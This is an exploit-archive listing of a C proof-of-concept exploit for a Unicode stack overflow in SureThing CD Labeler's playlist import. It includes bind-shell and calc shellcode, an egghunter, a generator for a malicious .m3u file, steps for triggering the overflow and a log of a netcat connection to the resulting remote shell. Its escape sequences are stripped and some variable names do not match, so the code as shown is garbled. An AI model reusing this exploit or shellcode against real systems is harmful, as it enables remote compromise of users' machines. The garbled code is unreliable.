SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit
# Published : 2010-06-08
# Author : mr_me
# Previous Title : Buffer Overflow ActivePerl v5.8.8.817
# Next Title : SasCam 2.7 ActiveX Head Buffer Overflow
/*
surethingcdlabelerbofpoc.c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit
Found by: Ruben Alejandro - chap0
Author: Steven Seeley - mr_me (http://net-ninja.net/)
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Writeup: Unicode, the magic of exploiting 0x00410041 (https://net-ninja.net/blog/?p=71)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage:
Compile this with lcc-win32 and execute it choosing your shellcode to create the .m3u file.
Then click on 'playlists' --> 'Import Playlist from Hard Drive' -->
'Import playlist from a file on my computer' --> for filetype select 'Generic m3u/pls file'
--> open evil m3u file --> boom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.5] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:>
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
   http://metasploit.com */

unsigned char bind[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a";

unsigned char calc[] =
"xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41";

// unicode encoded egghunter
unsigned char egghunter[] =
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"
"1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"
"AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"
"O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA";

// venetian shellcode
unsigned char getAddressAndAlignEaxThenJmp[] =
"x58x6dx58x6dx58x6dx58x6dx05x02x22x6dx2dx02x11x6d"
"x2dx02x11x6dx50x6dxc3";

unsigned char tag[] = "x77x30x30x74x77x30x30x74";

int main ( int argc , char * argv[])
{
    FILE* expfle = NULL;
    char* SEH = "x72x73"; // CALL DWORD PTR SS:[EBP-4] from dwwin.dll
	char* NSEH = "x41x6d";    int i;

	printf("n***************************************************************************n");
    printf("tSureThing CD Labeler Unicode stack overflow PoC Exploitn");
    printf("tFound by: Ruben Alejandro - chap0n");
	printf("tCode by: Steven Seeley - mr_men");
   	printf("thttp://www.net-ninja.net/n");
   	printf("***************************************************************************n");

    if( (expfle=fopen("cst-surethingcdlabeler.m3u","wb")) ==NULL )
    {
         perror("n[-] Cannot create the exploit file..");
         exit(0);
    }

                for (i=0; i<8; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

                fwrite(egghunter, sizeof(egghunter)-1, 1, expfle); // egghunter

                for (i=0; i<62; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

				fwrite(nseh, sizeof(nseh)-1, 1, expfle); // nseh - walk
				fwrite(seh, sizeof(seh)-1, 1, expfle); // seh - unicode friendly
				fwrite(getAddressAndAlignEaxThenJmp, // custom unicode shellcode
				sizeof(getAddressAndAlignEaxThenJmp)-1, 1, expfle);

				for (i=0; i<405; i++)
                {
                    fwrite("x41", 1, 1, expfle); // junk
                }

				fwrite(tag, sizeof(tag)-1, 1, expfle); // egghunter tag

				printf ("n[+] Enter shellcode option: n");
				printf ("nt1. Bindshell on port 4444");
				printf ("nt2. Calc.exen");
  				scanf ("%d",&i);

				if (i == 1){
					fwrite(bind, sizeof(bind)-1, 1, expfle); // bind
				}
				else if (i == 2){
					fwrite(calc, sizeof(calc)-1, 1, expfle); // calc
				}

                fclose(expfle);
                printf("n[+] cst-surethingcdlabeler.m3u created successfully! rn");

    return 0;

}